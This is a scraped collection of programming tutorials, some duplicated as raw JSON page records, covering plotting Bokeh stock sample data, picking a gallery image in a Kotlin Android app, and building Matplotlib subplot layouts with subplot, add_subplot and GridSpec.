Python Bokeh – Visualizing Stock Data - GeeksforGeeks
03 Jul, 2020 Bokeh is an interactive data visualization library for Python. It renders its plots using HTML and JavaScript and targets modern web browsers, providing elegant, concise construction of novel graphics with high-performance interactivity. Bokeh can be used to visualize stock market data. Visualization is done using the plotting module. Here we will be using the sample stock datasets provided by Bokeh.

To download the sample datasets, run the following command on the command line:

bokeh sampledata

Alternatively, we can execute the following Python code:

import bokeh
bokeh.sampledata.download()

The sample data provided by Bokeh contains stock datasets for the following companies:

AAPL, which is Apple
FB, which is Facebook
GOOG, which is Google
IBM, which is International Business Machines
MSFT, which is Microsoft Corporation

All these datasets are available as CSV files. Below is a glimpse into the IBM.csv file:

Date        Open    High    Low     Close   Volume    Adj Close
01-03-2000  102     105.5   100.06  100.25  10807800  84.48
02-03-2000  100.5   105.44  99.5    103.12  11192900  86.9
03-03-2000  107.25  110     106.06  108     10162800  91.01
06-03-2000  109.94  111     101     103.06  10747400  86.85
07-03-2000  106     107     101.69  103     10035100  86.8

The file contains stock data between the years 2000 and 2013, with over 3000 entries. We will plot a line graph that tracks the closing price of the stocks of all 5 available companies between 2000 and 2013.

Import the required modules:
numpy
figure, output_file and show from bokeh.plotting
AAPL, FB, GOOG, IBM and MSFT from bokeh.sampledata.stocks
Instantiate a figure object with the title and axis types.
Give names to the x-axis and the y-axis.
Plot line graphs for all 5 companies.
Display the model.
# importing the modules
import numpy as np
from bokeh.plotting import figure, output_file, show
from bokeh.sampledata.stocks import AAPL, FB, GOOG, IBM, MSFT

# the file to save the model
output_file("gfg.html")

# instantiating the figure object
graph = figure(x_axis_type = "datetime", title = "Stock Closing Prices")

# name of the x-axis
graph.xaxis.axis_label = 'Date'

# name of the y-axis
graph.yaxis.axis_label = 'Price (in USD)'

# plotting the line graph for AAPL
x_axis_coordinates = np.array(AAPL['date'], dtype = np.datetime64)
y_axis_coordinates = AAPL['adj_close']
color = "lightblue"
legend_label = 'AAPL'
graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label)

# plotting the line graph for FB
x_axis_coordinates = np.array(FB['date'], dtype = np.datetime64)
y_axis_coordinates = FB['adj_close']
color = "black"
legend_label = 'FB'
graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label)

# plotting the line graph for GOOG
x_axis_coordinates = np.array(GOOG['date'], dtype = np.datetime64)
y_axis_coordinates = GOOG['adj_close']
color = "orange"
legend_label = 'GOOG'
graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label)

# plotting the line graph for IBM
x_axis_coordinates = np.array(IBM['date'], dtype = np.datetime64)
y_axis_coordinates = IBM['adj_close']
color = "darkblue"
legend_label = 'IBM'
graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label)

# plotting the line graph for MSFT
x_axis_coordinates = np.array(MSFT['date'], dtype = np.datetime64)
y_axis_coordinates = MSFT['adj_close']
color = "yellow"
legend_label = 'MSFT'
graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label)

# relocating the legend table to
# avoid obstruction of the graph
graph.legend.location = "top_left"

# displaying the model
show(graph)

Output : the model is saved to gfg.html and opens in the browser as a single chart with the five adjusted-closing-price lines and the legend in the top-left corner.
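One design note: the five per-company blocks above are identical apart from the dataset, color, and label, so they can be collapsed into a single loop. The following is a minimal sketch of that refactor, not part of the original article; the dictionary layout is an illustrative choice.

# loop-based version of the per-company plotting above (sketch)
import numpy as np
from bokeh.plotting import figure, output_file, show
from bokeh.sampledata.stocks import AAPL, FB, GOOG, IBM, MSFT

output_file("gfg.html")
graph = figure(x_axis_type = "datetime", title = "Stock Closing Prices")
graph.xaxis.axis_label = 'Date'
graph.yaxis.axis_label = 'Price (in USD)'

# map each legend label to its dataset and line color
stocks = {'AAPL': (AAPL, "lightblue"), 'FB': (FB, "black"),
          'GOOG': (GOOG, "orange"), 'IBM': (IBM, "darkblue"),
          'MSFT': (MSFT, "yellow")}

for label, (data, color) in stocks.items():
    dates = np.array(data['date'], dtype = np.datetime64)
    graph.line(dates, data['adj_close'], color = color, legend_label = label)

graph.legend.location = "top_left"
show(graph)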
[ { "code": null, "e": 24320, "s": 24292, "text": "\n03 Jul, 2020" }, { "code": null, "e": 24732, "s": 24320, "text": "Bokeh is a Python interactive data visualization. It renders its plots using HTML and JavaScript. It targets modern web browsers for presentation providing elegant, concise construction of novel graphics with high-performance interactivity.Bokeh can be used to visualize stock market data. Visualization is be done using the plotting module. Here we will be using the sample stock datasets given to us by Bokeh." }, { "code": null, "e": 24812, "s": 24732, "text": "To download the sample datasets run the following command on the command line :" }, { "code": null, "e": 24829, "s": 24812, "text": "bokeh sampledata" }, { "code": null, "e": 24892, "s": 24829, "text": "Alternatively, we can also execute the following Python code :" }, { "code": null, "e": 24934, "s": 24892, "text": "import bokeh\nbokeh.sampledata.download()\n" }, { "code": null, "e": 25034, "s": 24934, "text": "In the sample data provided by Bokeh, there are datasets of the stocks of the following companies :" }, { "code": null, "e": 25054, "s": 25034, "text": "AAPL which is Apple" }, { "code": null, "e": 25075, "s": 25054, "text": "FB which is Facebook" }, { "code": null, "e": 25096, "s": 25075, "text": "GOOG which is Google" }, { "code": null, "e": 25141, "s": 25096, "text": "IBM which is International Business Machines" }, { "code": null, "e": 25177, "s": 25141, "text": "MSFT which is Microsoft Corporation" }, { "code": null, "e": 25267, "s": 25177, "text": "All these datasets are available as CSV files. Below is a glimpse into the IBM.csv file :" }, { "code": null, "e": 25666, "s": 25267, "text": "Date Open High Low Close Volume Adj Close\n01-03-2000 102 105.5 100.06 100.25 10807800 84.48\n02-03-2000 100.5 105.44 99.5 103.12 11192900 86.9\n03-03-2000 107.25 110 106.06 108 10162800 91.01\n06-03-2000 109.94 111 101 103.06 10747400 86.85\n07-03-2000 106 107 101.69 103 10035100 86.8\n" }, { "code": null, "e": 25755, "s": 25666, "text": "The file contains the stock data between the years 2000 and 2013 with over 3000 entries." }, { "code": null, "e": 25903, "s": 25755, "text": "We will be plotting a line graph which will track the closing price of the stocks between the years 2000 and 2013 of all the 5 available companies." }, { "code": null, "e": 26196, "s": 25903, "text": "Import the required modules :numpyfigure, output_file and show from bokeh.plottingAAPL, FB, GOOG, IBM and MSFT from bokeh.sampledata.stocksInstantiate a figure object with the title and axis types.Give the names to x-axis and y-axis.Plot line graphs for all the 5 companies.Display the model." }, { "code": null, "e": 26336, "s": 26196, "text": "Import the required modules :numpyfigure, output_file and show from bokeh.plottingAAPL, FB, GOOG, IBM and MSFT from bokeh.sampledata.stocks" }, { "code": null, "e": 26342, "s": 26336, "text": "numpy" }, { "code": null, "e": 26391, "s": 26342, "text": "figure, output_file and show from bokeh.plotting" }, { "code": null, "e": 26449, "s": 26391, "text": "AAPL, FB, GOOG, IBM and MSFT from bokeh.sampledata.stocks" }, { "code": null, "e": 26508, "s": 26449, "text": "Instantiate a figure object with the title and axis types." }, { "code": null, "e": 26545, "s": 26508, "text": "Give the names to x-axis and y-axis." }, { "code": null, "e": 26587, "s": 26545, "text": "Plot line graphs for all the 5 companies." }, { "code": null, "e": 26606, "s": 26587, "text": "Display the model." 
}, { "code": "# importing the modulesimport numpy as npfrom bokeh.plotting import figure, output_file, showfrom bokeh.sampledata.stocks import AAPL, FB, GOOG, IBM, MSFT # the file to save the modeloutput_file(\"gfg.html\") # instantiating the figure objectgraph = figure(x_axis_type = \"datetime\", title = \"Stock Closing Prices\") # name of the x-axisgraph.xaxis.axis_label = 'Date' # name of the y-axisgraph.yaxis.axis_label = 'Price (in USD)' # plotting the line graph for AAPLx_axis_coordinates = np.array(AAPL['date'], dtype = np.datetime64)y_axis_coordinates = AAPL['adj_close']color = \"lightblue\"legend_label = 'AAPL'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # plotting the line graph for FBx_axis_coordinates = np.array(FB['date'], dtype = np.datetime64)y_axis_coordinates = FB['adj_close']color = \"black\"legend_label = 'FB'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # plotting the line graph for GOOGx_axis_coordinates = np.array(GOOG['date'], dtype = np.datetime64)y_axis_coordinates = GOOG['adj_close']color = \"orange\"legend_label = 'GOOG'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # plotting the line graph for IBMx_axis_coordinates = np.array(IBM['date'], dtype = np.datetime64)y_axis_coordinates = IBM['adj_close']color = \"darkblue\"legend_label = 'IBM'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # plotting the line graph for MSFTx_axis_coordinates = np.array(MSFT['date'], dtype = np.datetime64)y_axis_coordinates = MSFT['adj_close']color = \"yellow\"legend_label = 'MSFT'graph.line(x_axis_coordinates, y_axis_coordinates, color = color, legend_label = legend_label) # relocating the legend table to # avoid abstruction of the graphgraph.legend.location = \"top_left\" # displaying the modelshow(graph)", "e": 28636, "s": 26606, "text": null }, { "code": null, "e": 28645, "s": 28636, "text": "Output :" }, { "code": null, "e": 28664, "s": 28645, "text": "Data Visualization" }, { "code": null, "e": 28677, "s": 28664, "text": "Python-Bokeh" }, { "code": null, "e": 28684, "s": 28677, "text": "Python" }, { "code": null, "e": 28782, "s": 28684, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 28810, "s": 28782, "text": "Read JSON file using Python" }, { "code": null, "e": 28860, "s": 28810, "text": "Adding new column to existing DataFrame in Pandas" }, { "code": null, "e": 28882, "s": 28860, "text": "Python map() function" }, { "code": null, "e": 28926, "s": 28882, "text": "How to get column names in Pandas dataframe" }, { "code": null, "e": 28944, "s": 28926, "text": "Python Dictionary" }, { "code": null, "e": 28967, "s": 28944, "text": "Taking input in Python" }, { "code": null, "e": 29002, "s": 28967, "text": "Read a file line by line in Python" }, { "code": null, "e": 29024, "s": 29002, "text": "Enumerate() in Python" }, { "code": null, "e": 29056, "s": 29024, "text": "How to Install PIP on Windows ?" } ]
How to pick an image from an image gallery on Android using Kotlin?
This example demonstrates how to pick an image from an image gallery on Android using Kotlin. Step 1 − Create a new project in Android Studio, go to File ⇒ New Project and fill in all required details to create a new project. Step 2 − Add the following code to res/layout/activity_main.xml. <?xml version="1.0" encoding="utf-8"?>
<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
    android:layout_width="fill_parent"
    android:layout_height="fill_parent"
    android:orientation="vertical"
    android:padding="2dp">
    <ImageView
        android:id="@+id/imageView"
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:layout_weight="1" />
    <Button
        android:id="@+id/buttonLoadPicture"
        android:layout_width="wrap_content"
        android:layout_height="wrap_content"
        android:layout_gravity="center"
        android:layout_weight="0"
        android:text="Load Picture" />
</LinearLayout> Step 3 − Add the following code to src/MainActivity.kt import android.content.Intent
import android.net.Uri
import android.os.Bundle
import android.provider.MediaStore
import android.widget.Button
import android.widget.ImageView
import androidx.appcompat.app.AppCompatActivity
class MainActivity : AppCompatActivity() {
    lateinit var imageView: ImageView
    lateinit var button: Button
    // request code used to identify the gallery result
    private val pickImage = 100
    private var imageUri: Uri? = null
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        title = "KotlinApp"
        imageView = findViewById(R.id.imageView)
        button = findViewById(R.id.buttonLoadPicture)
        button.setOnClickListener {
            // launch the system gallery picker
            val gallery = Intent(Intent.ACTION_PICK, MediaStore.Images.Media.INTERNAL_CONTENT_URI)
            startActivityForResult(gallery, pickImage)
        }
    }
    override fun onActivityResult(requestCode: Int, resultCode: Int, data: Intent?) {
        super.onActivityResult(requestCode, resultCode, data)
        if (resultCode == RESULT_OK && requestCode == pickImage) {
            // display the image the user picked
            imageUri = data?.data
            imageView.setImageURI(imageUri)
        }
    }
} Step 4 − Add the following code to androidManifest.xml <?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.q11">
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
</manifest> Let's try to run the application. I assume you have connected your actual Android mobile device to your computer. To run the app from Android Studio, open one of your project's activity files and click the Run icon in the toolbar. Select your mobile device as an option and then check your mobile device, which will display your default screen.
[ { "code": null, "e": 1156, "s": 1062, "text": "This example demonstrates how to pick an image from an image gallery on Android using Kotlin." }, { "code": null, "e": 1285, "s": 1156, "text": "Step 1 − Create a new project in Android Studio, go to File ⇒ New Project and fill all required details to create a new project." }, { "code": null, "e": 1350, "s": 1285, "text": "Step 2 − Add the following code to res/layout/activity_main.xml." }, { "code": null, "e": 2028, "s": 1350, "text": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<LinearLayout xmlns:android=\"http://schemas.android.com/apk/res/android\"\n android:layout_width=\"fill_parent\"\n android:layout_height=\"fill_parent\"\n android:orientation=\"vertical\"\n android:padding=\"2dp\">\n <ImageView\n android:id=\"@+id/imageView\"\n android:layout_width=\"match_parent\"\n android:layout_height=\"wrap_content\"\n android:layout_weight=\"1\" />\n <Button\n android:id=\"@+id/buttonLoadPicture\"\n android:layout_width=\"wrap_content\"\n android:layout_height=\"wrap_content\"\n android:layout_gravity=\"center\"\n android:layout_weight=\"0\"\n android:text=\"Load Picture\" />\n</LinearLayout>" }, { "code": null, "e": 2083, "s": 2028, "text": "Step 3 − Add the following code to src/MainActivity.kt" }, { "code": null, "e": 3243, "s": 2083, "text": "import android.content.Intent\nimport android.net.Uri\nimport android.os.Bundle\nimport android.provider.MediaStore\nimport android.widget.Button\nimport android.widget.ImageView\nimport androidx.appcompat.app.AppCompatActivity\nclass MainActivity : AppCompatActivity() {\n lateinit var imageView: ImageView\n lateinit var button: Button\n private val pickImage = 100\n private var imageUri: Uri? = null\n override fun onCreate(savedInstanceState: Bundle?) {\n super.onCreate(savedInstanceState)\n setContentView(R.layout.activity_main)\n title = \"KotlinApp\"\n imageView = findViewById(R.id.imageView)\n button = findViewById(R.id.buttonLoadPicture)\n button.setOnClickListener {\n val gallery = Intent(Intent.ACTION_PICK, MediaStore.Images.Media.INTERNAL_CONTENT_URI)\n startActivityForResult(gallery, pickImage)\n }\n }\n override fun onActivityResult(requestCode: Int, resultCode: Int, data: Intent?) {\n super.onActivityResult(requestCode, resultCode, data)\n if (resultCode == RESULT_OK && requestCode == pickImage) {\n imageUri = data?.data\n imageView.setImageURI(imageUri)\n }\n }\n}" }, { "code": null, "e": 3298, "s": 3243, "text": "Step 4 − Add the following code to androidManifest.xml" }, { "code": null, "e": 4044, "s": 3298, "text": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<manifest xmlns:android=\"http://schemas.android.com/apk/res/android\" package=\"com.example.q11\">\n<uses-permission android:name=\"android.permission.READ_EXTERNAL_STORAGE\"/>\n <application\n android:allowBackup=\"true\"\n android:icon=\"@mipmap/ic_launcher\"\n android:label=\"@string/app_name\"\n android:roundIcon=\"@mipmap/ic_launcher_round\"\n android:supportsRtl=\"true\"\n android:theme=\"@style/AppTheme\">\n <activity android:name=\".MainActivity\">\n <intent-filter>\n <action android:name=\"android.intent.action.MAIN\" />\n <category android:name=\"android.intent.category.LAUNCHER\" />\n </intent-filter>\n </activity>\n </application>\n</manifest>" }, { "code": null, "e": 4393, "s": 4044, "text": "Let's try to run your application. I assume you have connected your actual Android Mobile device with your computer. 
To run the app from android studio, open one of your project's activity files and click the Run icon from the toolbar. Select your mobile device as an option and then check your mobile device which will display your default screen." }, { "code": null, "e": 4434, "s": 4393, "text": "Click here to download the project code." } ]
Customizing Multiple Subplots in Matplotlib | by Rizky Maulana N | Towards Data Science
Sometimes, we need to visualize our data in complex plots, either because the analysis demands it or simply to make a great plot. For example, say you want to add a zoom effect to your plot, as shown in Figure 1. To present it, you need to build a convoluted subplot. Figure 1 is built from three different axes: axes1, axes2, and axes3. Axes1 is on the top-left panel, showing the data in green plot lines, axes2 is on the top-right panel with orange lines, and the biggest one, axes3, lies on the bottom panel.

Before creating complex plots, you need to know the difference between the terms figure and axes in Matplotlib. To do so, you can study the anatomy of a figure as defined in Matplotlib, shown in Figure 2.

Figure is defined as the main container for all elements, such as axes, legend, title, etc. A figure can contain several axes (we will learn more in-depth about this). In Figure 1, we have only one figure, which contains three axes. If you want to create a zoom effect in Matplotlib, you can visit this link.

In this section, we will learn about the fundamentals of the subplot in Matplotlib. Some examples that I will show you are not realistic plots, but they will be good examples for understanding the subplot.

To create axes, you can use at least two different methods. First, you can use the subplot syntax, and the second is using gridspec. At the beginning of learning subplot, I will show you a simple subplot, as shown in Figure 3.

You can generate Figure 3 using the following code

import matplotlib.pyplot as plt

fig = plt.figure()
coord = 111
plt.subplot(coord)
plt.annotate('subplot ' + str(coord), xy = (0.5, 0.5), va = 'center', ha = 'center')

One of the important things in understanding the subplot in Matplotlib is defining the coordinate of the axes. The variable coord in the code above is 111. It consists of three numbers representing the number of rows, the number of columns, and the axes' sequence. A coord of 111 means you generate a figure that consists of one row and one column, and you insert the subplot into the first sequence axes. Because you only have one row and one column (meaning you only have one cell), your axes are the main figure. You can also generate Figure 3 without the subplot syntax because you only generate one axes in a figure.

The next step is creating two horizontal axes in a figure, as shown in Figure 4. You can use this code to generate it

fig = plt.figure(figsize=(12, 4))
coord1 = 121
coord2 = 122
plt.subplot(coord1)
plt.annotate('subplot ' + str(coord1), xy = (0.5, 0.5), va = 'center', ha = 'center')
plt.subplot(coord2)
plt.annotate('subplot ' + str(coord2), xy = (0.5, 0.5), va = 'center', ha = 'center')

You need to define the figure size to create two nice horizontal axes. If you did not do it, you would get a figure like Figure 5.

If you want to create two vertical axes instead, you just change coord1 and coord2, as shown in the following code

fig = plt.figure(figsize=(6, 7))
coord1 = 211
coord2 = 212
plt.subplot(coord1)
plt.annotate('subplot ' + str(coord1), xy = (0.5, 0.5), va = 'center', ha = 'center')
plt.subplot(coord2)
plt.annotate('subplot ' + str(coord2), xy = (0.5, 0.5), va = 'center', ha = 'center')

Now, I will try to create more subplots in a figure using a loop. I will create 2x4 axes, as shown in Figure 6.
You can reproduce Figure 6 using this code

fig = plt.figure(figsize=(16, 6))
coord = []

# create coord array from 241, 242, 243, ..., 248
for i in range(1, 9):   # in python, 9 is not included
    row = 2
    column = 4
    coord.append(str(row) + str(column) + str(i))

# create subplot 241, 242, 243, ..., 248
for i in range(len(coord)):
    plt.subplot(int(coord[i]))   # cast to int; newer Matplotlib versions reject string specs
    plt.annotate('subplot ' + str(coord[i]), xy = (0.5, 0.5), va = 'center', ha = 'center')

Because you want to create 8 axes (2 rows and 4 columns), you need to make an array from 241 to 248. After that, create the subplots using the same procedure as the previous code, but place it inside a loop.

As I mentioned before, besides using subplot to create some axes in a figure, you can also use gridspec. For example, if you want to create Figure 6 (two rows and 4 columns) with gridspec, you can use this code

import matplotlib.pyplot as plt

fig = plt.figure(figsize=(16, 6))
rows = 2
columns = 4
grid = plt.GridSpec(rows, columns, wspace = .25, hspace = .25)

for i in range(rows * columns):
    exec (f"plt.subplot(grid{[i]})")
    plt.annotate('subplot 24_grid[' + str(i) + ']', xy = (0.5, 0.5), va = 'center', ha = 'center')

To create a simple subplot using gridspec, you define the number of rows and columns at the beginning. To embed a subplot into the figure, you just call its grid number. In gridspec, numbering starts from 0, not 1. So, if you want to embed 8 subplots in a figure using gridspec, you call them from 0 to 7, using plt.subplot(grid[0]) through plt.subplot(grid[7]). In the loop, each call is built as a string and run with exec (f"...{[i]}") so the index can be injected into the brackets; note that calling plt.subplot(grid[i]) directly works just as well.

Figure 7 is the result of creating 8 axes using gridspec.

One of the advantages of using gridspec is that you can create many subplots more easily than with subplot alone. A subplot specification consists of only three digits, e.g., 111, 428, 439, etc., so it cannot accommodate a fourth digit. For example, say you want to create 18 axes (3 rows and 6 columns) in a figure. Using subplot alone, you would need to define 361, 362, 363, ..., 3616, and you would hit an error as soon as you embed subplot 3610. To solve this, you can use gridspec. Figure 8 presents the creation of 18 axes using gridspec.
You can create Figure 8 with this code

fig = plt.figure(figsize=(22, 8))
rows = 3
columns = 6
grid = plt.GridSpec(rows, columns, wspace = .25, hspace = .25)

for i in range(rows * columns):
    exec (f"plt.subplot(grid{[i]})")
    plt.annotate('subplot 36_grid[' + str(i) + ']', xy = (0.5, 0.5), va = 'center', ha = 'center')

To make a more realistic example, I will insert a plot into each axes of Figure 8. So, I need to make 18 different functions, one for each axes. They are built from the function sin(x^(i/9)), where i is the grid number from 0 to 17. You can see the plot in Figure 9.

To create Figure 9, you can use the following code

import numpy as np
import matplotlib.pyplot as plt

fig = plt.figure(figsize=(25, 10))
color = ['#00429d', '#2754a6', '#3a67ae', '#487bb7', '#548fc0', '#5ea3c9',
         '#66b8d3', '#6acedd', '#68e5e9', '#ffe2ca', '#ffc4b4', '#ffa59e',
         '#f98689', '#ed6976', '#dd4c65', '#ca2f55', '#b11346', '#93003a']
rows = 3
columns = 6
grid = plt.GridSpec(rows, columns, wspace = .25, hspace = .25)

for i in range(rows * columns):
    np.random.seed(100)
    x = np.linspace(0., 5., 100)
    y = np.sin(x**(i / 9)) + np.random.random() * i
    exec (f"plt.subplot(grid{[i]})")
    plt.plot(x, y, color = color[i])

To present them in different colors, you also need to define 18 different colors. You can generate the colors using this link. I have explained how to use it in the following link.

In this section, we will learn about customizing complicated axes using add_subplot and GridSpec. The complicated axes I mentioned are shown in Figure 10.

We will create 3 axes (2 on the top, 1 on the bottom panel), as shown in Figure 1, using the add_subplot syntax. You can use this code to create it.

If you analyze the code, you will see a concept similar to the subplot syntax. There are three coordinates you need to define, e.g., (2, 2, 1) or (2, 2, (3, 4)). The axes sub1 is placed in the first axes (1) of a figure that consists of 2 rows and 2 columns. sub2 follows a similar scheme to sub1. The important one is sub3, which is the combination of axes 3 and 4; so, the coordinate of sub3 is (2, 2, (3, 4)). If you run the code, you will get a result, as shown in Figure 11.

If you want to add a plot to each ax, you can add this code after defining sub1, sub2, and sub3.

sub1.plot(x, y)
sub2.plot(x, y)
sub3.plot(x, y)

The full code is here. You will get a result, as shown in Figure 12.

As an alternative, you can also create Figure 12 using the gridspec syntax. Here is the code you can use to create it.

The code creates 2 rows and 2 columns. sub1 and sub2 are placed on the first row, in column 0 and column 1 (remember that gridspec indexing starts from 0). sub3 is placed on the second row and takes all of the columns, represented by :. You will get the same plot, as shown in Figure 12, if you run the code.

The second example of complicated axes is shown in Figure 13. You will generate four axes in a figure: sub1, sub2, sub3, and sub4, in 2 rows and 4 columns. sub1 takes all the columns in the first row. sub2, sub3, and sub4 are placed on the columns of the second row. To generate Figure 13, you can use this code. To create Figure 13 using gridspec, you can use this code instead.

I think the code above is clear enough to be understood :D. The code will generate a plot, as shown in Figure 14.

The third example is shown in Figure 15. To create Figure 15, you can use this code. To create Figure 15 using gridspec, you can use this code instead. The result is shown in Figure 16.

In the last example, you will be guided to create 6 axes in a figure, with 4 rows and 2 columns. It is shown in Figure 17. To create it with add_subplot, you can use the following code. To create Figure 17 with gridspec, you can use this code. You need to pay attention to sub4, which is placed in rows 1:3 and column 1. Rows 1:3 means that sub4 will take rows number 1 and 2; remember, row 3 is not included. The code will generate a plot, as shown in Figure 17.
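Since several of the snippets above are referenced as "this code" without being shown, here is a minimal, self-contained sketch of the first complicated layout (two axes on top, one spanning the bottom), written in both styles. It follows the coordinates described in the text; the figure sizes and plotted data are illustrative assumptions, not the original snippets.

import numpy as np
import matplotlib.pyplot as plt

x = np.linspace(0., 5., 100)
y = np.sin(x)

# style 1: add_subplot on a 2x2 grid; cells 3 and 4 are merged for sub3
fig = plt.figure(figsize=(10, 6))
sub1 = fig.add_subplot(2, 2, 1)       # top-left
sub2 = fig.add_subplot(2, 2, 2)       # top-right
sub3 = fig.add_subplot(2, 2, (3, 4))  # bottom, spanning both columns
sub1.plot(x, y)
sub2.plot(x, y)
sub3.plot(x, y)

# style 2: the same layout with GridSpec (indexing starts at 0)
fig = plt.figure(figsize=(10, 6))
grid = plt.GridSpec(2, 2, wspace = .25, hspace = .25)
sub1 = plt.subplot(grid[0, 0])  # first row, first column
sub2 = plt.subplot(grid[0, 1])  # first row, second column
sub3 = plt.subplot(grid[1, :])  # second row, all columns
sub1.plot(x, y)
sub2.plot(x, y)
sub3.plot(x, y)

plt.show()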
Creating a complex plot to visualize your data is needed when you are working with complex data. I hope this story can help you to visualize your data from a different point of view. If you need to create scientific publication plots with Matplotlib, you can visit this link.

That's all. Thanks for reading this story. Comment and share if you like it. I also recommend you follow my account to get a notification when I post a new story.
[ { "code": null, "e": 664, "s": 172, "text": "In certain times, we need to visualize our data into complex plots because we should do it or make a great plot. For example, you want to make a zoom effect in your plot, as shown in Figure 1. To present it, you need to build a convoluted subplot. Figure 1 is built from three different axes: axes1, axes2, and axes3. Axes1 is on the top-left panel, showing the data in green plot lines, axes2 is on the top-right panel with orange lines, and the biggest one, axes3 lies on the bottom panel." }, { "code": null, "e": 875, "s": 664, "text": "Before creating complex plots, you need to know the difference between the terms figure and axes in Matplotlib. To do it, you can learn about the anatomy of a figure defined in Matplotlib, as shown in Figure 2." }, { "code": null, "e": 1178, "s": 875, "text": "Figure is defined as the main container for all elements, such as axes, legend, title, etc. A figure can contain some axes (we will learn in more in-depth about it). In Figure 1, we have only one figure, which contains three axes. If you want to create a zoom effect in Maptlotlib, you visit this link." }, { "code": null, "e": 1201, "s": 1178, "text": "towardsdatascience.com" }, { "code": null, "e": 1404, "s": 1201, "text": "In this section, we will learn about the fundamental of the subplot in Matplotlib. Some examples that I will show you are not realistic plots, but it will become good examples to understand the subplot." }, { "code": null, "e": 1639, "s": 1404, "text": "To create axes, you can use at least two different methods. First, you can use the syntax subplot, and the second one is using gridspec. At the beginning of the learning subplot, I will show you a simple subplot, as shown in Figure 3." }, { "code": null, "e": 1690, "s": 1639, "text": "You can generate Figure 3 using the following code" }, { "code": null, "e": 1853, "s": 1690, "text": "import matplotlib.pyplot as pltfig = plt.figure()coord = 111plt.subplot(coord)plt.annotate('subplot ' + str(coord), xy = (0.5, 0.5), va = 'center', ha = 'center')" }, { "code": null, "e": 2446, "s": 1853, "text": "One of the important things to understand the subplot in Matplotlib is defining the coordinate of the axes. The variable coord in the code above is 111. It consists of three numbers representing the number of rows, columns, and the axes’ sequence. coord 111 means, you generate a figure that consists of one row, one column, and you insert the subplot in the first sequence axes. Because you only have one row and one column (it means you only have one cell), your axes are the main figure. You also can generate Figure 3 without subplot syntax because you only generate one axes in a figure." }, { "code": null, "e": 2560, "s": 2446, "text": "Next step is creating two horizontal axes in a figure, as shown in Figure 4. You can use this code to generate it" }, { "code": null, "e": 2826, "s": 2560, "text": "fig = plt.figure(figsize=(12, 4))coord1 = 121coord2 = 122plt.subplot(coord1)plt.annotate('subplot ' + str(coord1), xy = (0.5, 0.5), va = 'center', ha = 'center')plt.subplot(coord2)plt.annotate('subplot ' + str(coord2), xy = (0.5, 0.5), va = 'center', ha = 'center')" }, { "code": null, "e": 2961, "s": 2826, "text": "You need to define the figure size to create a nice two horizontal axes. If you did not do it, you would get a figure like a Figure 5." 
}, { "code": null, "e": 3072, "s": 2961, "text": "If you want to create two vertical axes, you just change the coord1 and coord2, as shown in the following code" }, { "code": null, "e": 3337, "s": 3072, "text": "fig = plt.figure(figsize=(6, 7))coord1 = 211coord2 = 212plt.subplot(coord1)plt.annotate('subplot ' + str(coord1), xy = (0.5, 0.5), va = 'center', ha = 'center')plt.subplot(coord2)plt.annotate('subplot ' + str(coord2), xy = (0.5, 0.5), va = 'center', ha = 'center')" }, { "code": null, "e": 3449, "s": 3337, "text": "Now, I will try to create more subplot in a figure using looping. I will create 2x4 axes, as shown in Figure 6." }, { "code": null, "e": 3492, "s": 3449, "text": "You can reproduce Figure 6 using this code" }, { "code": null, "e": 3895, "s": 3492, "text": "fig = plt.figure(figsize=(16, 6))coord = []# create coord array from 241, 242, 243, ..., 248 for i in range(1, 9): # in python, 9 is not included row = 2 column = 4 coord.append(str(row)+str(column)+str(i)) # create subplot 241, 242, 243, ..., 248for i in range(len(coord)): plt.subplot(coord[i]) plt.annotate('subplot ' + str(coord[i]), xy = (0.5, 0.5), va = 'center', ha = 'center')" }, { "code": null, "e": 4111, "s": 3895, "text": "Because you want to create 8 axes (2 rows and 4 columns), so you need to make an array from 241 to 248. After that, create the subplot using the same procedure with the previous code, but place it in looping syntax." }, { "code": null, "e": 4322, "s": 4111, "text": "As I mentioned before, besides using subplot to create some axes in a figure, you can also use gridspec. For example, if you want to create Figure 6 (two rows and 4 columns) with gridspec, you can use this code" }, { "code": null, "e": 4631, "s": 4322, "text": "import matplotlib.pyplot as pltfig = plt.figure(figsize=(16, 6))rows = 2columns = 4grid = plt.GridSpec(rows, columns, wspace = .25, hspace = .25)for i in range(rows*columns): exec (f\"plt.subplot(grid{[i]})\") plt.annotate('subplot 24_grid[' + str(i) + ']', xy = (0.5, 0.5), va = 'center', ha = 'center')" }, { "code": null, "e": 5155, "s": 4631, "text": "To create simple subplot using gridspec, you define the number of rows and columns in the beginning. To embed the subplot into figure, you just call the number of subplot. In gridspec, number of subplot is starting from 0, not 1. So, if you want to embed 8 columns in a figure using gridspec, you need to call them from 0 to 7, using plt.subplot(grid[0]) until plt.subplot(grid[7]). In the looping, you will get an issue because you want to call grid number using []. To deal with it, you can use syntax exec (f”...{[i]}”)." }, { "code": null, "e": 5212, "s": 5155, "text": "Figure 7 is the result of creating 8 axes using gridspec" }, { "code": null, "e": 5852, "s": 5212, "text": "One of 